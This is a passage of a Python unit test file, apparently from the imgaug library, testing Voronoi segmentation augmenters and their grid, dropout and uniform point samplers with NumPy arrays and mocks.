image = np.arange(2*2*3).astype(np.uint8).reshape((2, 2, 3))
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image, image_seg)
@classmethod
def _test_image_n_channels_integrationtest(cls, nb_channels):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
if nb_channels is not None:
image = np.tile(image[:, :, np.newaxis], (1, 1, nb_channels))
for c in sm.xrange(nb_channels):
image[..., c] += c
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels1 = image[0:2, 0:2]
pixels2 = image[0:2, 2:4]
avg_color1 = np.average(pixels1.astype(np.float32), axis=(0, 1))
avg_color2 = np.average(pixels2.astype(np.float32), axis=(0, 1))
image_expected = np.uint8([
[avg_color1, avg_color1, avg_color2, avg_color2],
[avg_color1, avg_color1, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_image_has_no_channels_integrationtest(self):
self._test_image_n_channels_integrationtest(None)
def test_image_has_one_channel_integrationtest(self):
self._test_image_n_channels_integrationtest(1)
def test_image_has_three_channels_integrationtest(self):
self._test_image_n_channels_integrationtest(3)
def test_replace_mask_is_all_false_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([False, False], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_replace_mask_is_mixed_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([False, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels2 = image[0:2, 2:4]
avg_color2 = np.sum(pixels2).astype(np.float32) / pixels2.size
image_expected = np.uint8([
[0, 1, avg_color2, avg_color2],
[2, 3, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_replace_mask_is_none_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = None
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels1 = image[0:2, 0:2]
pixels2 = image[0:2, 2:4]
avg_color1 = np.sum(pixels1).astype(np.float32) / pixels1.size
avg_color2 = np.sum(pixels2).astype(np.float32) / pixels2.size
image_expected = np.uint8([
[avg_color1, avg_color1, avg_color2, avg_color2],
[avg_color1, avg_color1, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_no_cell_coordinates_provided_and_no_channel_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_no_cell_coordinates_provided_and_3_channels_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
image = np.tile(image[..., np.newaxis], (1, 1, 3))
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_height(self):
image = np.zeros((0, 4, 3), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_width(self):
image = np.zeros((4, 0, 3), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_size(self):
image = np.zeros((0, 0), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
class TestVoronoi(unittest.TestCase):
def setUp(self):
reseed()
def test___init___defaults(self):
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler)
assert aug.points_sampler is sampler
assert isinstance(aug.p_replace, iap.Deterministic)
assert aug.p_replace.value == 1
assert aug.max_size == 128
assert aug.interpolation == "linear"
def test___init___custom_arguments(self):
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, p_replace=0.5, max_size=None,
interpolation="cubic")
assert aug.points_sampler is sampler
assert isinstance(aug.p_replace, iap.Binomial)
assert np.isclose(aug.p_replace.p.value, 0.5)
assert aug.max_size is None
assert aug.interpolation == "cubic"
def test_max_size_is_none(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, max_size=None)
mock_imresize = mock.MagicMock()
mock_imresize.return_value = image
fname = "imgaug.imresize_single_image"
with mock.patch(fname, mock_imresize):
_image_aug = aug(image=image)
assert mock_imresize.call_count == 0
def test_max_size_is_int_image_not_too_large(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, max_size=100)
mock_imresize = mock.MagicMock()
mock_imresize.return_value = image
fname = "imgaug.imresize_single_image"
with mock.patch(fname, mock_imresize):
_image_aug = aug(image=image)
assert mock_imresize.call_count == 0
def test_max_size_is_int_image_too_large(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, max_size=10)
mock_imresize = mock.MagicMock()
mock_imresize.return_value = image
fname = "imgaug.imresize_single_image"
with mock.patch(fname, mock_imresize):
_image_aug = aug(image=image)
assert mock_imresize.call_count == 1
assert mock_imresize.call_args_list[0][0][1] == (5, 10)
def test_interpolation(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, max_size=10, interpolation="cubic")
mock_imresize = mock.MagicMock()
mock_imresize.return_value = image
fname = "imgaug.imresize_single_image"
with mock.patch(fname, mock_imresize):
_image_aug = aug(image=image)
assert mock_imresize.call_count == 1
assert mock_imresize.call_args_list[0][1]["interpolation"] == "cubic"
def test_point_sampler_called(self):
class LoggedPointSampler(iaa.PointsSamplerIf):
def __init__(self, other):
self.other = other
self.call_count = 0
def sample_points(self, images, random_state):
self.call_count += 1
return self.other.sample_points(images, random_state)
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = LoggedPointSampler(iaa.RegularGridPointsSampler(1, 1))
aug = iaa.Voronoi(sampler)
_image_aug = aug(image=image)
assert sampler.call_count == 1
def test_point_sampler_returns_no_points_integrationtest(self):
class NoPointsPointSampler(iaa.PointsSamplerIf):
def sample_points(self, images, random_state):
return [np.zeros((0, 2), dtype=np.float32)]
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = NoPointsPointSampler()
aug = iaa.Voronoi(sampler)
image_aug = aug(image=image)
assert np.array_equal(image_aug, image)
@classmethod
def _test_image_with_n_channels(cls, nb_channels):
image = np.zeros((10, 20), dtype=np.uint8)
if nb_channels is not None:
image = image[..., np.newaxis]
image = np.tile(image, (1, 1, nb_channels))
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler)
mock_segment_voronoi = mock.MagicMock()
if nb_channels is None:
mock_segment_voronoi.return_value = image[..., np.newaxis]
else:
mock_segment_voronoi.return_value = image
fname = "imgaug.augmenters.segmentation.segment_voronoi"
with mock.patch(fname, mock_segment_voronoi):
image_aug = aug(image=image)
assert image_aug.shape == image.shape
def test_image_with_no_channels(self):
self._test_image_with_n_channels(None)
def test_image_with_one_channel(self):
self._test_image_with_n_channels(1)
def test_image_with_three_channels(self):
self._test_image_with_n_channels(3)
def test_p_replace_is_zero(self):
image = np.zeros((50, 50), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(50, 50)
aug = iaa.Voronoi(sampler, p_replace=0.0)
mock_segment_voronoi = mock.MagicMock()
mock_segment_voronoi.return_value = image[..., np.newaxis]
fname = "imgaug.augmenters.segmentation.segment_voronoi"
with mock.patch(fname, mock_segment_voronoi):
_image_aug = aug(image=image)
replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
assert not np.any(replace_mask)
def test_p_replace_is_one(self):
image = np.zeros((50, 50), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(50, 50)
aug = iaa.Voronoi(sampler, p_replace=1.0)
mock_segment_voronoi = mock.MagicMock()
mock_segment_voronoi.return_value = image[..., np.newaxis]
fname = "imgaug.augmenters.segmentation.segment_voronoi"
with mock.patch(fname, mock_segment_voronoi):
_image_aug = aug(image=image)
replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
assert np.all(replace_mask)
def test_p_replace_is_50_percent(self):
image = np.zeros((200, 200), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(200, 200)
aug = iaa.Voronoi(sampler, p_replace=0.5)
mock_segment_voronoi = mock.MagicMock()
mock_segment_voronoi.return_value = image[..., np.newaxis]
fname = "imgaug.augmenters.segmentation.segment_voronoi"
with mock.patch(fname, mock_segment_voronoi):
_image_aug = aug(image=image)
replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
replace_fraction = np.average(replace_mask.astype(np.float32))
assert 0.4 <= replace_fraction <= 0.6
def test_determinism_integrationtest(self):
image = np.arange(10*20).astype(np.uint8).reshape((10, 20, 1))
image = np.tile(image, (1, 1, 3))
image[:, :, 1] += 5
image[:, :, 2] += 10
sampler = iaa.DropoutPointsSampler(
iaa.RegularGridPointsSampler((1, 10), (1, 20)),
0.5
)
aug = iaa.Voronoi(sampler, p_replace=(0.0, 1.0))
aug_det = aug.to_deterministic()
images_aug_a1 = aug(images=[image] * 50)
images_aug_a2 = aug(images=[image] * 50)
images_aug_b1 = aug_det(images=[image] * 50)
images_aug_b2 = aug_det(images=[image] * 50)
same_within_a1 = _all_arrays_identical(images_aug_a1)
same_within_a2 = _all_arrays_identical(images_aug_a2)
same_within_b1 = _all_arrays_identical(images_aug_b1)
same_within_b2 = _all_arrays_identical(images_aug_b2)
same_between_a1_a2 = _array_lists_elementwise_identical(images_aug_a1,
images_aug_a2)
same_between_b1_b2 = _array_lists_elementwise_identical(images_aug_b1,
images_aug_b2)
assert not same_within_a1
assert not same_within_a2
assert not same_within_b1
assert not same_within_b2
assert not same_between_a1_a2
assert same_between_b1_b2
def test_get_parameters(self):
sampler = iaa.RegularGridPointsSampler(1, 1)
aug = iaa.Voronoi(sampler, p_replace=0.5, max_size=None,
interpolation="cubic")
params = aug.get_parameters()
assert params[0] is sampler
assert isinstance(params[1], iap.Binomial)
assert np.isclose(params[1].p.value, 0.5)
assert params[2] is None
assert params[3] == "cubic"
def _all_arrays_identical(arrs):
if len(arrs) == 1:
return True
return np.all([np.array_equal(arrs[0], arr_other)
for arr_other in arrs[1:]])
def _array_lists_elementwise_identical(arrs1, arrs2):
return np.all([np.array_equal(arr1, arr2)
for arr1, arr2 in zip(arrs1, arrs2)])
class TestUniformVoronoi(unittest.TestCase):
def test___init___(self):
rs = np.random.RandomState(10)
mock_voronoi = mock.MagicMock()
mock_voronoi.return_value = mock_voronoi
fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
with mock.patch(fname, mock_voronoi):
_ = iaa.UniformVoronoi(
100,
p_replace=0.5,
max_size=5,
interpolation="cubic",
name="foo",
deterministic=True,
random_state=rs
)
assert mock_voronoi.call_count == 1
assert isinstance(mock_voronoi.call_args_list[0][1]["points_sampler"],
iaa.UniformPointsSampler)
assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
0.5)
assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
def test___init___integrationtest(self):
rs = iarandom.RNG(10)
aug = iaa.UniformVoronoi(
100,
p_replace=0.5,
max_size=5,
interpolation="cubic",
name=None,
deterministic=True,
random_state=rs
)
assert aug.points_sampler.n_points.value == 100
assert np.isclose(aug.p_replace.p.value, 0.5)
assert aug.max_size == 5
assert aug.interpolation == "cubic"
assert aug.name == "UnnamedUniformVoronoi"
assert aug.deterministic is True
assert aug.random_state.equals(rs)
class TestRegularGridVoronoi(unittest.TestCase):
def test___init___(self):
rs = np.random.RandomState(10)
mock_voronoi = mock.MagicMock()
mock_voronoi.return_value = mock_voronoi
fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
with mock.patch(fname, mock_voronoi):
_ = iaa.RegularGridVoronoi(
10,
20,
p_drop_points=0.6,
p_replace=0.5,
max_size=5,
interpolation="cubic",
name="foo",
deterministic=True,
random_state=rs
)
assert mock_voronoi.call_count == 1
ps = mock_voronoi.call_args_list[0][1]["points_sampler"]
assert isinstance(ps, iaa.DropoutPointsSampler)
assert isinstance(ps.other_points_sampler,
iaa.RegularGridPointsSampler)
assert np.isclose(ps.p_drop.p.value, 1-0.6)
assert ps.other_points_sampler.n_rows.value == 10
assert ps.other_points_sampler.n_cols.value == 20
assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
0.5)
assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
def test___init___integrationtest(self):
rs = iarandom.RNG(10)
aug = iaa.RegularGridVoronoi(
10,
(10, 30),
p_replace=0.5,
max_size=5,
interpolation="cubic",
name=None,
deterministic=True,
random_state=rs
)
assert np.isclose(aug.points_sampler.p_drop.p.value, 1-0.4)
assert aug.points_sampler.other_points_sampler.n_rows.value == 10
assert isinstance(aug.points_sampler.other_points_sampler.n_cols,
iap.DiscreteUniform)
assert aug.points_sampler.other_points_sampler.n_cols.a.value == 10
assert aug.points_sampler.other_points_sampler.n_cols.b.value == 30
assert np.isclose(aug.p_replace.p.value, 0.5)
assert aug.max_size == 5
assert aug.interpolation == "cubic"
assert aug.name == "UnnamedRegularGridVoronoi"
assert aug.deterministic is True
assert aug.random_state.equals(rs)
class TestRelativeRegularGridVoronoi(unittest.TestCase):
def test___init___(self):
rs = np.random.RandomState(10)
mock_voronoi = mock.MagicMock()
mock_voronoi.return_value = mock_voronoi
fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
with mock.patch(fname, mock_voronoi):
_ = iaa.RelativeRegularGridVoronoi(
0.1,
0.2,
p_drop_points=0.6,
p_replace=0.5,
max_size=5,
interpolation="cubic",
name="foo",
deterministic=True,
random_state=rs
)
assert mock_voronoi.call_count == 1
ps = mock_voronoi.call_args_list[0][1]["points_sampler"]
assert isinstance(ps, iaa.DropoutPointsSampler)
assert isinstance(ps.other_points_sampler,
iaa.RelativeRegularGridPointsSampler)
assert np.isclose(ps.p_drop.p.value, 1-0.6)
assert np.isclose(ps.other_points_sampler.n_rows_frac.value, 0.1)
assert np.isclose(ps.other_points_sampler.n_cols_frac.value, 0.2)
assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
0.5)
assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
def test___init___integrationtest(self):
rs = iarandom.RNG(10)
aug = iaa.RelativeRegularGridVoronoi(
0.1,
(0.1, 0.3),
p_replace=0.5,
max_size=5,
interpolation="cubic",
name=None,
deterministic=True,
random_state=rs
)
ps = aug.points_sampler
assert np.isclose(aug.points_sampler.p_drop.p.value, 1-0.4)
assert np.isclose(ps.other_points_sampler.n_rows_frac.value, 0.1)
assert isinstance(ps.other_points_sampler.n_cols_frac, iap.Uniform)
assert np.isclose(ps.other_points_sampler.n_cols_frac.a.value, 0.1)
assert np.isclose(ps.other_points_sampler.n_cols_frac.b.value, 0.3)
assert np.isclose(aug.p_replace.p.value, 0.5)
assert aug.max_size == 5
assert aug.interpolation == "cubic"
assert aug.name == "UnnamedRelativeRegularGridVoronoi"
assert aug.deterministic is True
assert aug.random_state.equals(rs)
# TODO verify behaviours when image height/width is zero
class TestRegularGridPointSampler(unittest.TestCase):
def setUp(self):
reseed()
def test___init___(self):
sampler = iaa.RegularGridPointsSampler((1, 10), 20)
assert isinstance(sampler.n_rows, iap.DiscreteUniform)
assert sampler.n_rows.a.value == 1
assert sampler.n_rows.b.value == 10
assert sampler.n_cols.value == 20
def test_sample_single_point(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 1)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
assert len(points) == 1
assert np.allclose(points[0], [10.0, 5.0])
def test_sample_points(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(2, 2)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
assert len(points) == 4
assert np.allclose(points, [
[0.0, 0.0],
[10.0, 0.0],
[0.0, 10.0],
[10.0, 10.0]
])
def test_sample_points_stochastic(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, iap.Choice([1, 2]))
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
matches_two_points = np.allclose(points, [
[0.0, 5.0],
[10.0, 5.0]
])
assert len(points) in [1, 2]
assert matches_single_point or matches_two_points
def test_sample_points_cols_is_zero(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(iap.Deterministic(0), 1)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
assert len(points) == 1
assert matches_single_point
def test_sample_points_rows_is_zero(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, iap.Deterministic(0))
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
assert len(points) == 1
assert matches_single_point
def test_sample_points_rows_is_more_than_image_height(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(2, 1)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[0.5, 0.5]
])
assert len(points) == 1
assert matches_single_point
def test_sample_points_cols_is_more_than_image_width(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler(1, 2)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[0.5, 0.5]
])
assert len(points) == 1
assert matches_single_point
def test_determinism(self):
image = np.zeros((500, 500, 1), dtype=np.uint8)
sampler = iaa.RegularGridPointsSampler((1, 500), (1, 500))
points_seed1_1 = sampler.sample_points([image], 1)[0]
points_seed1_2 = sampler.sample_points([image], 1)[0]
points_seed2_1 = sampler.sample_points([image], 2)[0]
assert points_seed1_1.shape == points_seed1_2.shape
assert points_seed1_1.shape != points_seed2_1.shape
def test_conversion_to_string(self):
sampler = iaa.RegularGridPointsSampler(10, (10, 30))
expected = (
"RegularGridPointsSampler("
"Deterministic(int 10), "
"DiscreteUniform(Deterministic(int 10), Deterministic(int 30))"
")"
)
assert sampler.__str__() == sampler.__repr__() == expected
class TestRelativeRegularGridPointSampler(unittest.TestCase):
def setUp(self):
reseed()
def test___init___(self):
sampler = iaa.RelativeRegularGridPointsSampler((0.1, 0.2), 0.1)
assert isinstance(sampler.n_rows_frac, iap.Uniform)
assert np.isclose(sampler.n_rows_frac.a.value, 0.1)
assert np.isclose(sampler.n_rows_frac.b.value, 0.2)
assert np.isclose(sampler.n_cols_frac.value, 0.1)
def test_sample_single_point(self):
image = np.zeros((10, 20, 3), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler(0.001, 0.001)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
assert len(points) == 1
assert np.allclose(points[0], [10.0, 5.0])
def test_sample_points(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler(0.2, 0.2)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
assert len(points) == 4
assert np.allclose(points, [
[0.0, 0.0],
[10.0, 0.0],
[0.0, 10.0],
[10.0, 10.0]
])
def test_sample_points_stochastic(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler(0.1,
iap.Choice([0.1, 0.2]))
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
matches_two_points = np.allclose(points, [
[0.0, 5.0],
[10.0, 5.0]
])
assert len(points) in [1, 2]
assert matches_single_point or matches_two_points
def test_sample_points_cols_is_zero(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler(iap.Deterministic(0.001),
0.1)
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
assert len(points) == 1
assert matches_single_point
def test_sample_points_rows_is_zero(self):
image = np.zeros((10, 10, 3), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler(0.1,
iap.Deterministic(0.001))
points = sampler.sample_points([image], np.random.RandomState(1))[0]
matches_single_point = np.allclose(points, [
[5.0, 5.0]
])
assert len(points) == 1
assert matches_single_point
def test_determinism(self):
image = np.zeros((500, 500, 1), dtype=np.uint8)
sampler = iaa.RelativeRegularGridPointsSampler((0.01, 1.0), (0.1, 1.0))
points_seed1_1 = sampler.sample_points([image], 1)[0]
points_seed1_2 = sampler.sample_points([image], 1)[0]
points_seed2_1 = sampler.sample_points([image], 2)[0]
assert points_seed1_1.shape == points_seed1_2.shape
assert points_seed1_1.shape != points_seed2_1.shape
def test_conversion_to_string(self):
sampler = iaa.RelativeRegularGridPointsSampler(0.01, (0.01, 0.05))
expected = (
"RelativeRegularGridPointsSampler("
"Deterministic(float 0.01000000), "
"Uniform("
"Deterministic(float 0.01000000), "
"Deterministic(float 0.05000000)"
")"
")"
)
assert sampler.__str__() == sampler.__repr__() == expected
class _FixedPointsSampler(iaa.PointsSamplerIf):
def __init__(self, points):
self.points = np.float32(np.copy(points))
self.last_random_state = None
def sample_points(self, images, random_state):
self.last_random_state = random_state
return np.tile(self.points[np.newaxis, ...], (len(images), 1))
class TestDropoutPointsSampler(unittest.TestCase):
def setUp(self):
reseed()
def test___init__(self):
other = iaa.RegularGridPointsSampler(1, 1)
sampler = iaa.DropoutPointsSampler(other, 0.5)
assert sampler.other_points_sampler is other
assert isinstance(sampler.p_drop, iap.Binomial)
assert np.isclose(sampler.p_drop.p.value, 0.5)
def test_p_drop_is_0_percent(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0, 1000.0, num=100000)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.DropoutPointsSampler(other, 0.0)
observed = sampler.sample_points([image], 1)[0]
assert np.allclose(observed, points)
def test_p_drop_is_100_percent(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.DropoutPointsSampler(other, 1.0)
observed = sampler.sample_points([image], 1)[0]
eps = 1e-4
assert len(observed) == 1
assert 0.0 + 0.9 - eps <= observed[0][0] <= 1000.0 - 0.9 + eps
assert 0.0 + 0.9 - eps <= observed[0][1] <= 1000.0 - 0.9 + eps
def test_p_drop_is_50_percent(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.DropoutPointsSampler(other, 0.5)
observed = sampler.sample_points([image], 1)[0]
assert 50000 - 1000 <= len(observed) <= 50000 + 1000
def test_determinism(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.DropoutPointsSampler(other, (0.3, 0.7))
observed_s1_1 = sampler.sample_points([image], 1)[0]
observed_s1_2 = sampler.sample_points([image], 1)[0]
observed_s2_1 = sampler.sample_points([image], 2)[0]
assert np.allclose(observed_s1_1, observed_s1_2)
assert (observed_s1_1.shape != observed_s2_1.shape
or not np.allclose(observed_s1_1, observed_s2_1))
def test_random_state_propagates(self):
image = np.zeros((1, 1, 3), dtype=np.uint8)
points = np.linspace(0.0+0.9, 1000.0-0.9, num=1)
points = np.stack([points, points], axis=-1)
other = _FixedPointsSampler(points)
sampler = iaa.DropoutPointsSampler(other, 0.5)
_ = sampler.sample_points([image], 1)[0]
rs_s1_1 = other.last_random_state
_ = sampler.sample_points([image], 1)[0]
rs_s1_2 = other.last_random_state
_ = sampler.sample_points([image], 2)[0]
rs_s2_1 = other.last_random_state
assert rs_s1_1.equals(rs_s1_2)
assert not rs_s1_1.equals(rs_s2_1)
def test_conversion_to_string(self):
sampler = iaa.DropoutPointsSampler(
iaa.RegularGridPointsSampler(10, 20),
0.2
)
expected = (
"DropoutPointsSampler("
"RegularGridPointsSampler("
"Deterministic(int 10), "
"Deterministic(int 20)"
"), "
"Binomial(Deterministic(float 0.80000000))"
")"
)
assert sampler.__str__() == sampler.__repr__() == expected
class TestUniformPointsSampler(unittest.TestCase):
def setUp(self):
reseed()
def test___init__(self):
sampler = iaa.UniformPointsSampler(100)
assert isinstance(sampler.n_points, iap.Deterministic)
assert sampler.n_points.value == 100
def test_sampled_points_not_identical(self):
sampler = iaa.UniformPointsSampler(3)
images = [np.zeros((1000, 1000, 3), dtype=np.uint8)]
points = sampler.sample_points(images, 1)[0]
points_tpls = [tuple(point) for point in points]
n_points = len(points)
n_points_uq = len(set(points_tpls))
assert n_points == 3
assert n_points_uq == 3
def test_sampled_points_uniformly_distributed_by_quadrants(self):
# split image into 2x2 quadrants, group all points per quadrant,
# assume that at least around N_points/(2*2) points are in each
# quadrant
sampler = iaa.UniformPointsSampler(10000)
images = [np.zeros((1000, 3000, 1), dtype=np.uint8)]
points = sampler.sample_points(images, 1)[0]
points_rel = points.astype(np.float32)
points_rel[:, 1] /= 1000
points_rel[:, 0] /= 3000
points_quadrants = np.clip(
np.floor(points_rel * 2),
0, 1
).astype(np.int32)
n_points_per_quadrant = np.zeros((2, 2), dtype=np.int32)
np.add.at(
n_points_per_quadrant,
(points_quadrants[:, 1], points_quadrants[:, 0]),
1)
assert np.all(n_points_per_quadrant > 0.8*(10000/4))
def test_sampled_points_uniformly_distributed_by_distance_from_origin(self):
# Sample N points, compute distances from origin each axis,
# split into B bins, assume that each bin contains at least around
# N/B points.
sampler = iaa.UniformPointsSampler(10000)
images = [np.zeros((1000, 3000, 1), dtype=np.uint8)]
points = sampler.sample_points(images, 1)[0]
points_rel = points.astype(np.float32)
points_rel[:, 1] /= 1000
points_rel[:, 0] /= 3000
points_bins = np.clip(
np.floor(points_rel * 10),
0, 1
).astype(np.int32)
# Don't use euclidean (2d) distance here, but instead axis-wise (1d)
# distance. The euclidean distance leads to non-uniform density of
# distances, because points on the same "circle" have the same
# distance, and there are less points close/far away from the origin
# that fall on the same circle.
points_bincounts_x = np.bincount(points_bins[:, 0])
points_bincounts_y = np.bincount(points_bins[:, 1])
assert np.all(points_bincounts_x > 0.8*(10000/10))
assert np.all(points_bincounts_y > 0.8*(10000/10))
def test_many_images(self):
sampler = iaa.UniformPointsSampler(1000)
images = [
np.zeros((100, 500, 3), dtype=np.uint8),
np.zeros((500, 100, 1), dtype=np.uint8)
]
points = sampler.sample_points(images, 1)
assert len(points) == 2
assert len(points[0]) == 1000
assert len(points[1]) == 1000
assert not np.allclose(points[0], points[1])
assert np.any(points[0][:, 1] < 20)
assert np.any(points[0][:, 1] > 0.9*100)
assert np.any(points[0][:, 0] < 20)
assert np.any(points[0][:, 0] > 0.9*500)
assert np.any(points[1][:, 1] < 20)
assert np.any(points[1][:, 1] > 0.9*500)
assert np.any(points[1][:, 0] < 20)
assert np.any(points[1][:, 0] > 0.9*100)
def test_always_at_least_one_point(self):
sampler = iaa.UniformPointsSampler(iap.Deterministic(0))
images = [np.zeros((10, 10, 1), dtype=np.uint8)]
points = sampler.sample_points(images, 1)[0]
assert len(points) == 1
def test_n_points_can_vary_between_calls(self):
sampler = iaa.UniformPointsSampler(iap.Choice([1, 10]))
images = [np.zeros((10, 10, 1), dtype=np.uint8)]
seen = {1: False, 10: False}
for i in sm.xrange(50):
points = sampler.sample_points(images, i)[0]
seen[len(points)] = True
if np.all(seen.values()):
break
